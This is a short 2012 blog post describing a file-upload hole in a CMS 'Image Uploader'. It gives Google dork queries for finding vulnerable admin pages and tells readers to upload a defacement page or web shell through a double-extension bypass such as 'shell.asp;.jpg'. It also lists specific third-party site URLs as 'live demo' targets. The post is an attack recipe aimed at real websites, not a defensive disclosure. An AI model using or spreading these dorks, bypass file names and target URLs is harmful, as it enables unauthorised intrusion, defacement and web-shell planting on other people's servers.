Search This Blog

Saturday, June 2, 2012

" Image Uploader" Shell Upload Vulnrability

"CMS admin Image UploaderShell Upload Vulnrability
image_2316596.original.jpg (300×300)
 

Google dorks
inurl:"default_image.asp"
inurl:"default_imagen.asp" 
inurl:"/box_image.htm"

You'll got a upload option after clicking on link that you got in google serach results
Now select your deface, or shell and upload it =)
supported foramts : shell.asp;.jpg, shell.php;.jpg, .gif, .jpg, .png, .pdf, .zip .html .php

you can use Tamper data too...

Live demo : 
https://www.thinkheartland.com/CMS/admin/default_Image.asp
https://www.thinkheartland.com/CMS/admin/images/backlinks.html

http://www.dautphetal.de/edit/default_asset.asp

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo
Posted by Vishal S Sangwa at 6/02/2012 11:17:00 AM
Labels: , ,

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)